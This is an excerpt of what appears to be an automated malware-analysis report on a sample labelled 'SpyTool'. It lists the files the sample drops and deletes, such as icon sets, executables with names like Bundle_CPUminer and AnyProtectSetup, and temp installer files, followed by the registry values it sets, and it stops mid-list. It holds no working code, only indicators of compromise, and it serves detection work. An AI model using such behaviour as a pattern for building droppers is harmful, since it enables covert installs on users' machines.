%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\amazon.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\cnn.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yandex.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\facebook.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\linkedin.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\chrome.packed.7z (1312726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_search.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\icon.json (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gizmodo.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\reddit.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\skype.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\expedia.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\google_translate.ico (1592 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3\27A66B06-9E26-42DD-B887-47E55490B3.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\27A66B06-9E26-42DD-B887-47E55490B3 (0 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (0 bytes)
The process nsx36.tmp:1468 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd3A.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn38.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd39.tmp (0 bytes)
The process encrypt.exe:1060 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (92311 bytes)
The process encrypt.exe:1476 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (24230 bytes)
The process encrypt.exe:1100 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (1447 bytes)
The process encrypt.exe:1584 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (31996 bytes)
The process nsx1C.tmp:1896 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1F.tmp (8776 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd20.tmp\registry.dll (0 bytes)
The process nsx1C.tmp:1088 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso22.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso23.tmp\System.dll (0 bytes)
The process nst25.tmp:1804 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj28.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp\System.dll (0 bytes)
The process nso3D.tmp:3724 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp\blowfish.dll (22 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv3F.tmp (0 bytes)
The process nsk6.tmp:204 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw8.tmp (0 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\policyname[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\vos[1].htm (989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso3D.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj32.tmp (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\setup_362[1].exe (17616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx46.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup_gmsd_re[1].exe (365499 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw33.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx37.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi31.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz16.tmp (0 bytes)
Registry activity
The process upgmsd_re_005010096.exe:1276 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "F855B05B-E99A-467D-A5E5-45A5C22EF132"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 B4 06 0A 8D 74 E3 01 4A AE E9 9B 9A 3E 79 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
